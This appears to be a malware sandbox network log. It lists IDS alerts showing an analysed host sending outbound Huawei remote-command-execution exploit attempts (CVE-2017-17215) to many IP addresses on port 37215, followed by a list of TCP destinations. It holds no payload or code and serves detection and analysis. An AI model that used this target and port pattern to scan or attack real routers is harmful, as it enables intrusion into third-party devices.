            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45376 -> 197.96.17.105:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45376 -> 197.96.17.105:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60880 -> 93.169.254.134:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60880 -> 93.169.254.134:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41652 -> 41.144.119.64:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41652 -> 41.144.119.64:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45896 -> 197.237.92.4:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45896 -> 197.237.92.4:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55952 -> 68.110.168.55:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55952 -> 68.110.168.55:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60042 -> 157.89.33.93:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60042 -> 157.89.33.93:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51958 -> 157.64.54.201:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51958 -> 157.64.54.201:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46942 -> 157.163.65.63:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46942 -> 157.163.65.63:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46124 -> 36.90.207.216:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46124 -> 36.90.207.216:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50700 -> 9.142.229.18:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50700 -> 9.142.229.18:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44242 -> 157.153.130.82:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44242 -> 157.153.130.82:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35850 -> 41.96.169.175:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35850 -> 41.96.169.175:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48272 -> 41.30.99.15:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48272 -> 41.30.99.15:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54400 -> 197.250.186.73:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54400 -> 197.250.186.73:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48842 -> 157.111.18.116:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48842 -> 157.111.18.116:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46476 -> 197.254.131.139:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46476 -> 197.254.131.139:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53610 -> 197.133.211.21:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53610 -> 197.133.211.21:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44260 -> 197.141.148.103:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44260 -> 197.141.148.103:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58036 -> 41.9.99.58:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58036 -> 41.9.99.58:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37904 -> 41.110.209.88:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37904 -> 41.110.209.88:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48340 -> 147.233.247.196:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48340 -> 147.233.247.196:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42232 -> 41.52.226.222:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42232 -> 41.52.226.222:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47854 -> 157.89.74.210:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47854 -> 157.89.74.210:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40762 -> 194.17.152.84:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40762 -> 194.17.152.84:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54048 -> 41.138.91.213:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54048 -> 41.138.91.213:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47884 -> 157.48.26.219:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47884 -> 157.48.26.219:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37822 -> 197.153.217.90:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37822 -> 197.153.217.90:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42856 -> 57.32.70.135:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42856 -> 57.32.70.135:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44356 -> 41.147.45.107:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44356 -> 41.147.45.107:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44740 -> 157.202.206.241:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44740 -> 157.202.206.241:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49210 -> 63.174.254.53:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49210 -> 63.174.254.53:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52114 -> 41.120.74.111:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52114 -> 41.120.74.111:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51694 -> 197.140.110.199:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51694 -> 197.140.110.199:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50510 -> 41.60.76.165:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50510 -> 41.60.76.165:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49626 -> 157.126.127.88:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49626 -> 157.126.127.88:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51100 -> 41.84.144.134:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51100 -> 41.84.144.134:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41034 -> 157.22.251.30:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41034 -> 157.22.251.30:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47820 -> 198.102.95.91:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47820 -> 198.102.95.91:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40742 -> 218.91.13.221:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40742 -> 218.91.13.221:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48036 -> 197.70.142.157:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48036 -> 197.70.142.157:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50334 -> 157.39.150.180:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50334 -> 157.39.150.180:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46236 -> 109.111.139.102:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46236 -> 109.111.139.102:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59608 -> 197.49.223.76:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59608 -> 197.49.223.76:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42828 -> 41.40.47.63:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42828 -> 41.40.47.63:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33080 -> 41.195.64.211:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33080 -> 41.195.64.211:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:60700 -> 157.246.143.239:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:60700 -> 157.246.143.239:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56054 -> 157.0.128.132:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56054 -> 157.0.128.132:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49124 -> 157.182.240.170:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49124 -> 157.182.240.170:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36988 -> 156.106.37.179:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36988 -> 156.106.37.179:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39458 -> 157.127.210.193:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39458 -> 157.127.210.193:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39446 -> 41.43.171.20:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39446 -> 41.43.171.20:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50262 -> 41.221.158.232:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50262 -> 41.221.158.232:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51098 -> 157.239.155.107:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51098 -> 157.239.155.107:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54574 -> 157.197.115.108:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54574 -> 157.197.115.108:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57178 -> 197.60.230.199:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57178 -> 197.60.230.199:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54350 -> 157.222.79.125:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54350 -> 157.222.79.125:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59334 -> 197.21.211.170:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59334 -> 197.21.211.170:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38448 -> 197.82.222.17:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38448 -> 197.82.222.17:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50424 -> 197.104.119.118:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50424 -> 197.104.119.118:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59394 -> 157.206.181.90:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59394 -> 157.206.181.90:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52256 -> 138.53.60.98:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52256 -> 138.53.60.98:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44680 -> 113.35.216.229:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44680 -> 113.35.216.229:37215
            Source: global trafficTCP traffic: 157.72.207.220 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.217.174.228 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.85.254.1 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.169.248.84 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.71.219.150 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 144.36.14.70 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.50.98.232 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.92.51.99 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.203.209.118 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.20.158.92 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.172.192.101 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.248.217.45 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.225.208.129 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 162.95.184.254 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.210.199.167 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.35.40.137 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.144.129.60 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.17.2.89 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.171.129.191 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 116.109.8.85 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.0.13.220 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 38.19.87.240 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.76.83.47 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 154.82.67.132 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.129.74.162 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.193.215.146 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.112.139.33 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.121.104.4 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 23.116.225.139 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 114.201.141.161 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.207.125.61 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 63.252.52.130 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.227.63.81 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 61.168.200.163 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.138.212.201 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 167.174.181.21 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 4.50.23.68 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.219.172.229 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 182.167.139.6 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.20.82.108 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 70.203.250.103 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.173.202.102 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.71.193.54 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 20.253.161.169 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.25.48.130 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.146.45.22 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 36.150.86.14 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.44.233.63 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 61.134.19.112 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.176.39.46 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.4.235.199 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.132.154.61 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.171.138.183 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.140.174.84 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.190.36.221 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 149.130.156.57 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.94.159.64 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.54.120.43 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.41.3.99 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.231.115.104 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.227.145.220 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 93.159.166.239 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 199.188.154.25 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.96.135.131 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 113.35.216.229 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 96.243.225.101 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.107.42.77 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.208.121.16 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.29.194.113 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 171.105.73.42 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.169.220.140 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 115.89.132.75 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.74.116.21 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.155.20.177 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 135.255.104.163 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 177.141.225.120 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 52.41.97.210 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.210.31.214 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.59.207.20 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 79.40.148.165 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 70.18.22.70 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.168.125.227 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.169.177.197 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.160.209.172 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.242.26.164 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.217.231.169 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.42.198.43 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.176.20.76 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 105.154.191.137 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 50.224.34.154 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.200.136.122 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 201.189.221.100 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.227.36.174 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.16.85.83 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.102.196.211 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 167.224.103.100 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 195.174.185.19 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 100.196.156.81 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.20.240.126 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.101.105.173 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.21.99.210 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.207.110.181 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.143.220.241 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.180.58.47 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.101.46.150 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 182.78.196.204 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 50.170.102.207 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 131.3.230.199 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 189.211.49.42 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 77.37.205.186 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 222.223.39.76 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 205.96.59.81 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 14.86.207.74 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 197.132.225.218 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 120.127.37.235 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 179.74.239.36 ports 1,2,3,5,7,37215
